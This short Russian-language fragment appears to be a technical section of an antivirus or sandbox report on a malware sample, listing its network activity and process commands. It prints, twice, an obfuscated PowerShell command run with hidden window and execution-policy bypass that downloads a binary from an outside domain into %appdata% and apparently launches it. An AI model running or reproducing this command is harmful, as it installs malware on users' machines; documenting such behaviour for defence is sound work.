Техническая информация
- http://efax.charleeblond.com/ddd04.bin как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWErShElL.exe -EXECUTiONpoLIcy BypasS -NOproFIlE -WIndowstYle hIDDeN (neW-ObJECT SySTem.NET.webcLiEnt).DownlOadFIlE('http://efax.charleeblond.com/ddd04.bin','%appDAta%.ExE');sta...
- 'ef##.##arleeblond.com':80
- DNS ASK ef##.##arleeblond.com
- '<SYSTEM32>\cmd.exe' /C "poWErShElL.exe -EXECUTiONpoLIcy BypasS -NOproFIlE -WIndowstYle hIDDeN (neW-ObJECT SySTem.NET.webcLiEnt).DownlOadFIlE('http://efax.charleeblond.com/ddd04.bin','%appDAta%.ExE');sta...' (со скрытым окном)